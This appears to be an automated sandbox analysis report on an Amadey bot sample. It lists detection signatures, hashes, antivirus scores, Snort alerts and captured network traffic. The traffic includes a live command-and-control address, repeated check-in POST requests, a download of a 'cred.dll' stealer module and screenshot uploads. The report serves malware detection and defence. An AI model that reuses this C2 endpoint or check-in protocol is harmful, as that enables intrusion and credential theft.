Windows Analysis Report
yIF7nMz573.exe

Overview

General Information

Sample Name: yIF7nMz573.exe
Analysis ID: 652395
MD5: dce2a8f4ab60879898a21ab451cad63f
SHA1: c889640843424e5ee1c6a7e31d25e3fa510b846b
SHA256: 2be50564951116ca5ac96158abdb936b6d5bd35794330371131f4117223cdd26
Tags: Amadeyexe
Infos:

Detection

Amadey
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Detected unpacking (overwrites its own PE header)
Yara detected Amadey bot
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Machine Learning detection for sample
Contains functionality to inject code into remote processes
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to record screenshots
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Abnormal high CPU Usage
Creates a DirectInput object (often for capturing keystrokes)
Drops PE files
Contains functionality to read the PEB
Uses reg.exe to modify the Windows registry
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: yIF7nMz573.exe Virustotal: Detection: 36% Perma Link
Source: yIF7nMz573.exe ReversingLabs: Detection: 46%
Antivirus detection for URL or domain
Source: http://185.215.113.15/Lkb2dxj3/cred.dll Avira URL Cloud: Label: malware
Source: http://185.215.113.15/Lkb2dxj3/index.php?scr=1 Avira URL Cloud: Label: malware
Source: http://185.215.113.15/Lkb2dxj3/index.php Avira URL Cloud: Label: malware
Source: 185.215.113.15/Lkb2dxj3/index.php Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: http://185.215.113.15/Lkb2dxj3/cred.dll Virustotal: Detection: 10% Perma Link
Source: http://185.215.113.15/Lkb2dxj3/index.php?scr=1 Virustotal: Detection: 16% Perma Link
Source: http://185.215.113.15/Lkb2dxj3/index.php Virustotal: Detection: 8% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe ReversingLabs: Detection: 46%
Machine Learning detection for sample
Source: yIF7nMz573.exe Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Joe Sandbox ML: detected
Source: 10.2.bguuwe.exe.ca0e67.1.raw.unpack Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.15/Lkb2dxj3/index.php", "Version": "3.21"}

Compliance
barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\yIF7nMz573.exe Unpacked PE file: 0.2.yIF7nMz573.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Unpacked PE file: 10.2.bguuwe.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Unpacked PE file: 19.2.bguuwe.exe.400000.0.unpack
Uses 32bit PE files
Source: yIF7nMz573.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\yIF7nMz573.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: Binary string: 4C:\muga-banel\tuf3_karas\xeyuno\kuzonubo\hezu\1\tex49.pdbhQE source: yIF7nMz573.exe, bguuwe.exe.0.dr
Source: Binary string: D:\Mktmp\NL1\Release\NL1.pdb source: bguuwe.exe, bguuwe.exe, 0000000A.00000003.309573312.0000000002680000.00000004.00001000.00020000.00000000.sdmp, bguuwe.exe, 0000000A.00000002.310851152.0000000000400000.00000040.00000001.01000000.00000004.sdmp, bguuwe.exe, 00000013.00000003.436338971.0000000001010000.00000004.00001000.00020000.00000000.sdmp, bguuwe.exe, 00000013.00000002.437486522.0000000000400000.00000040.00000001.01000000.00000004.sdmp
Source: Binary string: C:\muga-banel\tuf3_karas\xeyuno\kuzonubo\hezu\1\tex49.pdb source: yIF7nMz573.exe, bguuwe.exe.0.dr
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_004244D2 FindFirstFileExW, 0_2_004244D2
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Code function: 10_2_004244D2 FindFirstFileExW, 10_2_004244D2

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49742 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49744 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49745 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49746 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49747 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49749 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49750 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49751 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49753 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49754 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49756 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49757 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49758 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49761 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49765 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49755 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49767 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49773 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49774 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49775 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49776 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49777 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49780 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49781 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49782 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49783 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49784 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49785 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49786 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49787 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49788 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49789 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49790 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49791 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49793 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49795 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49796 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49797 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49798 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49794 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49799 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49801 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49802 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49803 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49805 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49806 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49809 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49810 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49812 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49813 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49815 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49816 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49817 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49818 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49820 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49823 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49824 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49825 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49826 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49828 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49829 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49830 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49832 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49833 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49839 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49841 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49842 -> 185.215.113.15:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49845 -> 185.215.113.15:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: 185.215.113.15/Lkb2dxj3/index.php
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: GET /Lkb2dxj3/cred.dll HTTP/1.1Host: 185.215.113.15
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----3071f00e42adff16a6518745df4c3290Host: 185.215.113.15Content-Length: 95417Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----d6afcb968497838ee04b7f9293290ab5Host: 185.215.113.15Content-Length: 100265Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----de41c2db1b9fd139ced25e2d3c1377b7Host: 185.215.113.15Content-Length: 97468Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----3823d6dafa9723c13eb7a8bc02000020Host: 185.215.113.15Content-Length: 95420Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
